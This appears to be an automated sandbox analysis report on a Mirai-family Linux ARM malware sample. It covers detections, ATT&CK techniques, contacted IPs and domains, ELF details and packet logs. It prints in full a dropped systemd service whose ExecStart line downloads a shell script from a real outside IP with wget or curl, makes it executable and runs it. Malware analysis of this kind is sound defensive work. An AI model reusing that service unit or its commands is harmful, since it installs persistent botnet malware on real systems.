Source: arm.elf, 6682.1.00007f1bec045000.00007f1bec250000.rw-.sdmpBinary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 6233.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.ygFtwt:
Source: arm.elf, 6233.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6420.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6422.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6428.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6433.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6442.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6444.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6450.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6455.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6461.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6487.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6490.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6500.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6506.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6513.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6544.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6546.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6557.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
Source: arm.elf, 6233.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6420.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6422.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6428.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6433.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6442.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6444.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6450.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6455.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6461.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6487.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6490.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6500.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6506.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6513.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6544.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6546.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmp, arm.elf, 6557.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm.elf, 6233.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6420.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6422.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6428.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6433.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6442.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6444.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6450.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6455.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6461.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6487.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6490.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6500.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6506.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6513.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6544.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6546.1.0000560ceef04000.0000560cef053000.rw-.sdmp, arm.elf, 6557.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
Source: arm.elf, 6233.1.00007ffd5a601000.00007ffd5a622000.rw-.sdmpBinary or memory string: /tmp/qemu-open.ygFtwt
Source: arm.elf, 6682.1.0000560ceef04000.0000560cef053000.rw-.sdmpBinary or memory string: P /var/lib/vmware/VGAuthQp9
Source: arm.elf, 6682.1.00007f1bec045000.00007f1bec250000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManager|P

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting		Valid AccountsWindows Management Instrumentation1
Systemd Service		1
Systemd Service		1
Hidden Files and Directories		1
OS Credential Dumping		11
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting		Boot or Logon Initialization Scripts1
Indicator Removal		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol		Traffic DuplicationData Destruction

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583073 Sample: arm.elf Startdate: 01/01/2025 Architecture: LINUX Score: 72 43 tcpdown.suo. [malformed] 2->43 45 109.202.202.202, 80 INIT7CH Switzerland 2->45 47 6 other IPs or domains 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 Multi AV Scanner detection for submitted file 2->51 9 arm.elf 2->9         started        12 gnome-session-binary sh gsd-rfkill 2->12         started        14 systemd snapd-env-generator 2->14         started        16 4 other processes 2->16 signatures3 53 Sends malformed DNS queries 43->53 process4 signatures5 59 Sample deletes itself 9->59 18 arm.elf 9->18         started        process6 process7 20 arm.elf 18->20         started        23 arm.elf sh 18->23         started        25 arm.elf sh 18->25         started        27 arm.elf 18->27         started        signatures8 55 Manipulation of devices in /dev 20->55 57 Deletes system log files 20->57 29 arm.elf 20->29         started        31 arm.elf 20->31         started        33 arm.elf 20->33         started        41 36 other processes 20->41 35 sh systemctl 23->35         started        37 sh systemctl 25->37         started        39 arm.elf 27->39         started        process9

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
arm.elf51%VirustotalBrowse
arm.elf53%ReversingLabsLinux.Trojan.Mirai
arm.elf100%AviraEXP/ELF.Mirai.W

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tcpdown.su
45.200.149.95
truefalse
    		high
    tcpdown.su|1
    		unknown
    		unknownfalse
      		unknown
      tcpdown.suo. [malformed]
      		unknown
      		unknowntrue
        		unknown
        tcpdown.su
        		unknown
        		unknownfalse
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://154.216.18.192/auto.shstartup_command.service.13.drfalse
            		high
            http://154.216.18.192/auto.sh;arm.elf, startup_command.service.13.drfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              107.175.130.16
              		unknownUnited States
              		36352AS-COLOCROSSINGUSfalse
              45.200.149.96
              		unknownSeychelles
              		328608Africa-on-Cloud-ASZAfalse
              109.202.202.202
              		unknownSwitzerland
              		13030INIT7CHfalse
              91.189.91.43
              		unknownUnited Kingdom
              		41231CANONICAL-ASGBfalse
              91.189.91.42
              		unknownUnited Kingdom
              		41231CANONICAL-ASGBfalse

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              107.175.130.16arm5.elfGet hashmaliciousUnknownBrowse
                arm.elfGet hashmaliciousUnknownBrowse
                  arm5.elfGet hashmaliciousUnknownBrowse
                    45.200.149.96mips.elfGet hashmaliciousUnknownBrowse
                      mpsl.elfGet hashmaliciousUnknownBrowse
                        mpsl.elfGet hashmaliciousUnknownBrowse
                          mips.elfGet hashmaliciousUnknownBrowse
                            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                            91.189.91.43mips.elfGet hashmaliciousUnknownBrowse
                              arm5.elfGet hashmaliciousUnknownBrowse
                                mpsl.elfGet hashmaliciousUnknownBrowse
                                  Mozi.m.elfGet hashmaliciousUnknownBrowse
                                    lx64.elfGet hashmaliciousUnknownBrowse
                                      arm.elfGet hashmaliciousUnknownBrowse
                                        mips.elfGet hashmaliciousUnknownBrowse
                                          arm6.elfGet hashmaliciousUnknownBrowse
                                            bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              185.232.205.48-bot.mpsl-2025-01-01T09_56_39.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                tcpdown.sux86_64.crdownload.0.drGet hashmaliciousUnknownBrowse
                                                • 104.168.45.11
                                                jmhrc116WA.elfGet hashmaliciousUnknownBrowse
                                                • 172.245.119.70

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                Africa-on-Cloud-ASZAmips.elfGet hashmaliciousUnknownBrowse
                                                • 45.200.149.249
                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                • 45.200.149.249
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 45.200.149.249
                                                DF2.exeGet hashmaliciousUnknownBrowse
                                                • 45.200.148.158
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 45.200.149.249
                                                mips.elfGet hashmaliciousUnknownBrowse
                                                • 45.200.149.249
                                                http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                • 45.200.149.223
                                                vcimanagement.armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 156.228.63.21
                                                vcimanagement.armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 156.228.216.13
                                                vcimanagement.powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 156.228.141.216
                                                CANONICAL-ASGBmips.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 185.125.190.26
                                                lx64.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                arm.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                mips.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                arm6.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                AS-COLOCROSSINGUSmips.elfGet hashmaliciousUnknownBrowse
                                                • 104.168.33.8
                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                • 107.175.130.16
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 104.168.33.8
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 104.168.33.8
                                                arm.elfGet hashmaliciousUnknownBrowse
                                                • 23.94.37.42
                                                mips.elfGet hashmaliciousUnknownBrowse
                                                • 104.168.33.8
                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                • 23.94.37.42
                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                • 104.168.45.33
                                                boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 104.168.45.33
                                                boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                • 104.168.45.33
                                                INIT7CHmips.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                lx64.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                arm.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                mips.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                arm6.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                • 109.202.202.202

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                /etc/systemd/system/startup_command.service

                                                Download File
                                                Process:/tmp/arm.elf
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):361
                                                Entropy (8bit):5.140421405816541
                                                Encrypted:false
                                                SSDEEP:6:z8jvIERZAMzdK+KOnFfltZCrXb1vN16R1E/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXpvL6vJ73GLHWrv
                                                MD5:4D2C868F454B6C55731485CF0F886DC0
                                                SHA1:032B125DE0A28DCEE8D8D25FBEEB56DB7F403F04
                                                SHA-256:8C4AE1B82477698F3A8C273B439CB9079794AFB8FC33CD4DEF854936BA37EA2C
                                                SHA-512:060B2413A0CB2DEC0DB059C190467B5CB0D76209EFFEA4AE3DE2701FA71429B811A6F7E11E813B26806CF72578D1F32B608A02A4CE670EC58B5B65433E3CF11D
                                                Malicious:false
                                                Reputation:low
                                                Preview:[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.

                                                /memfd:snapd-env-generator (deleted)

                                                Download File
                                                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):76
                                                Entropy (8bit):3.7627880354948586
                                                Encrypted:false
                                                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

                                                /tmp/qemu-open.ygFtwt (deleted)

                                                Download File
                                                Process:/tmp/arm.elf
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):13
                                                Entropy (8bit):3.3927474104487847
                                                Encrypted:false
                                                SSDEEP:3:Tg7G:Tgy
                                                MD5:060C950602AE5DFAF583473721C0D328
                                                SHA1:91D13B439729088DC17F1E0519970D82C56F2B07
                                                SHA-256:F8D4586FDF6230A2D5F431EF44BABDF37F6D7CEDBB3560702B0DC8493DD44EE3
                                                SHA-512:000D50E0A5736B0AB3B1BF61F55911914808FA197365B10F61F24096E2959ADAC2C3FF0D9ED226AD99934093F9FDD1C7035A22EEB5091DF75402A0A26E7A84AC
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:/tmp/arm.elf.

                                                Static File Info

                                                General

                                                File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                Entropy (8bit):5.915611147078294
                                                TrID:
                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                File name:arm.elf
                                                File size:84'644 bytes
                                                MD5:6a27b7679be2ee91ee53006b51832210
                                                SHA1:d2c2cd9791002177446ef2548392417ad87b4c9d
                                                SHA256:23815ea03401f17fedc670a93d733f1e62e68cf8a639092d3c53b53c1b4c9f4b
                                                SHA512:6cbe5f8e16a89f3ad9c738b1abe73c8b80f71ca046d1ec25353c13e7f129711b42a89198eb3dd7262fbc41a5c887eb4d58c712e77d575370ee8940c2f62f279e
                                                SSDEEP:1536:Hod+XgSg8lTipio2/UrwUTXwJHdvwTDFTcwLdPWrKsSTvUl:HodT6PpOwJ9YTDFcwpMqUl
                                                TLSH:3A833991BC815613C6C5127BFB6E428D372623A8D2EF3207DD266F21378692F0E77642
                                                File Content Preview:.ELF...a..........(.........4....I......4. ...(......................E...E...............E...E...E..................Q.td..................................-...L."...gF..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                Static ELF Info

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:ARM
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:ARM - ABI
                                                ABI Version:0
                                                Entry Point Address:0x8190
                                                Flags:0x202
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:3
                                                Section Header Offset:84244
                                                Section Header Size:40
                                                Number of Section Headers:10
                                                Header String Table Index:9

                                                Sections

                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .initPROGBITS0x80940x940x180x00x6AX004
                                                .textPROGBITS0x80b00xb00x119d40x00x6AX0016
                                                .finiPROGBITS0x19a840x11a840x140x00x6AX004
                                                .rodataPROGBITS0x19a980x11a980x2a780x00x2A004
                                                .ctorsPROGBITS0x245140x145140x80x00x3WA004
                                                .dtorsPROGBITS0x2451c0x1451c0x80x00x3WA004
                                                .dataPROGBITS0x245280x145280x3ac0x00x3WA004
                                                .bssNOBITS0x248d40x148d40xe7140x00x3WA004
                                                .shstrtabSTRTAB0x00x148d40x3e0x00x0001

                                                Program Segments

                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x80000x80000x145100x145105.94450x5R E0x8000.init .text .fini .rodata
                                                LOAD0x145140x245140x245140x3c00xead42.76900x6RW 0x8000.ctors .dtors .data .bss
                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 1, 2025 19:26:53.056572914 CET43928443192.168.2.2391.189.91.42
                                                Jan 1, 2025 19:26:55.306624889 CET458462601192.168.2.2345.200.149.96
                                                Jan 1, 2025 19:26:55.311448097 CET26014584645.200.149.96192.168.2.23
                                                Jan 1, 2025 19:26:55.311501980 CET458462601192.168.2.2345.200.149.96
                                                Jan 1, 2025 19:26:55.318274021 CET458462601192.168.2.2345.200.149.96
                                                Jan 1, 2025 19:26:55.323040009 CET26014584645.200.149.96192.168.2.23
                                                Jan 1, 2025 19:26:55.323082924 CET458462601192.168.2.2345.200.149.96
                                                Jan 1, 2025 19:26:55.327903986 CET26014584645.200.149.96192.168.2.23
                                                Jan 1, 2025 19:26:56.127604961 CET26014584645.200.149.96192.168.2.23
                                                Jan 1, 2025 19:26:56.127660036 CET458462601192.168.2.2345.200.149.96
                                                Jan 1, 2025 19:26:56.127824068 CET458462601192.168.2.2345.200.149.96
                                                Jan 1, 2025 19:26:58.431838036 CET42836443192.168.2.2391.189.91.43
                                                Jan 1, 2025 19:26:59.203727007 CET4251680192.168.2.23109.202.202.202
                                                Jan 1, 2025 19:27:02.288753986 CET570967722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.293592930 CET772257096107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.293652058 CET570967722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.295835018 CET570967722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.295916080 CET570967722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.299124956 CET570987722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.300645113 CET772257096107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.303920984 CET772257098107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.307722092 CET570987722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.342103004 CET772257096107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.354521036 CET570987722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.354583025 CET570987722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.359344959 CET772257098107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.406017065 CET772257098107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.642225027 CET571007722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.647144079 CET772257100107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.647239923 CET571007722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.648638010 CET571007722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.648638010 CET571007722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.653418064 CET772257100107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.665440083 CET772257096107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.665570974 CET570967722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:02.698020935 CET772257100107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.703660965 CET772257098107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:02.703830957 CET570987722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:03.038465023 CET772257100107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:03.038525105 CET571007722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:03.877614021 CET571027722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:03.882498026 CET772257102107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:03.882561922 CET571027722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:03.885811090 CET571027722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:03.885879040 CET571027722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:03.890625000 CET772257102107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:03.938044071 CET772257102107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:04.275625944 CET772257102107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:04.275672913 CET571027722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:05.896075010 CET571047722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:05.900897026 CET772257104107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:05.900974035 CET571047722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:05.904346943 CET571047722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:05.904412985 CET571047722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:05.909090042 CET772257104107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:05.950032949 CET772257104107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:05.983544111 CET571067722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:05.988379955 CET772257106107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:05.988431931 CET571067722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:06.029345036 CET571067722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:06.029678106 CET571067722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:06.034142017 CET772257106107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:06.082067013 CET772257106107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:06.153783083 CET571087722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:06.158605099 CET772257108107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:06.158663034 CET571087722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:06.165683985 CET571087722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:06.165806055 CET571087722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:06.171591043 CET772257108107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:06.214035988 CET772257108107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:06.363970995 CET772257106107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:06.364029884 CET571067722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:06.547776937 CET772257108107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:06.547837019 CET571087722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:09.290395021 CET772257104107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:09.290469885 CET571047722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.019550085 CET571107722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.024749994 CET772257110107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:11.024811983 CET571107722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.028249979 CET571107722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.028359890 CET571107722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.033052921 CET772257110107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:11.074032068 CET772257110107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:11.123673916 CET571127722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.128499031 CET772257112107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:11.128550053 CET571127722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.141357899 CET571127722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.141357899 CET571127722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.146171093 CET772257112107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:11.190021992 CET772257112107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:11.420521975 CET772257110107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:11.420579910 CET571107722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:11.492638111 CET772257112107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:11.492681980 CET571127722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:13.533770084 CET43928443192.168.2.2391.189.91.42
                                                Jan 1, 2025 19:27:15.955691099 CET571147722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:15.960022926 CET571167722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:15.960601091 CET772257114107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:15.960655928 CET571147722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:15.960985899 CET571147722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:15.961050034 CET571147722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:15.964813948 CET772257116107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:15.964869976 CET571167722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:15.965733051 CET772257114107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:15.969183922 CET571167722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:15.969278097 CET571167722192.168.2.23107.175.130.16
                                                Jan 1, 2025 19:27:15.973990917 CET772257116107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:16.010032892 CET772257114107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:16.017992020 CET772257116107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:16.333959103 CET772257114107.175.130.16192.168.2.23
                                                Jan 1, 2025 19:27:16.334022999 CET571147722192.168.2.23107.175.130.16
